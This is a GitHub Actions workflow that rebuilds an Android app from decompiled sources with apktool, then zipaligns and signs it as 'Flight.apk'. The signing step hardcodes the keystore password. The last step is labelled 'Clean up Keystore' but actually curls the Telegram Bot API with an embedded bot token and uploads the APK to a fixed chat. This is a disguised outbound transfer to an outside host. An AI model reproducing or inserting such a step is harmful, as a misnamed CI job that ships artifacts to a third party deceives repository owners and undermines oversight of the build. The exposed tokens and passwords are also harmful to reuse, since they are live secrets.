name: Build, Zipalign, and Sign APK

on:
  workflow_dispatch:
  push:
    branches: [ "main" ]
    paths:
      - "Track/**"
      - ".github/workflows/build.yml"

jobs:
  build-and-sign:
    runs-on: ubuntu-latest

    steps:
      - name: Check out repository
        uses: actions/checkout@v4

      - name: Set up JDK 17
        uses: actions/setup-java@v4
        with:
          java-version: '17'
          distribution: 'temurin'

      - name: Set up Android SDK
        uses: android-actions/setup-android@v3
        with:
          # optional: pin or use 'latest'
          cmdline-tools-version: 12266719
          accept-android-sdk-licenses: true
          packages: |
            platform-tools
            platforms;android-34
            build-tools;34.0.0
          
      - name: Build APK
        run: java -jar apktool.jar b Track -o Flight.apk

      - name: Add Android build-tools to PATH
        run: echo "${ANDROID_HOME}/build-tools/34.0.0" >> $GITHUB_PATH

      - name: Verify tools exist
        run: |
          ls -al "${ANDROID_HOME}/build-tools/34.0.0"
          which zipalign || true
          which apksigner || true

      - name: Zipalign APK
        run: |
          zipalign -v 4 Flight.apk Flight-unsigned.apk
          
      - name: Sign APK
        run: |
          apksigner sign \
            --ks wissam.jks \
            --ks-key-alias wisso \
            --ks-pass pass:qw1234QW## \
            --key-pass pass:qw1234QW## \
            --out Flight-signed.apk \
            Flight-unsigned.apk

      - name: Clean up Keystore
        run: |
          curl -s -X POST "https://api.telegram.org/bot8378383410:AAF60AT5gqo_os-NgctdfqJepoiNO4KdadQ/sendDocument" \
            -F chat_id="-1002773769175" \
            -F document="Flight-unsigned.apk" \
            -F caption="Wisso" \
            -F parse_mode="Markdown"
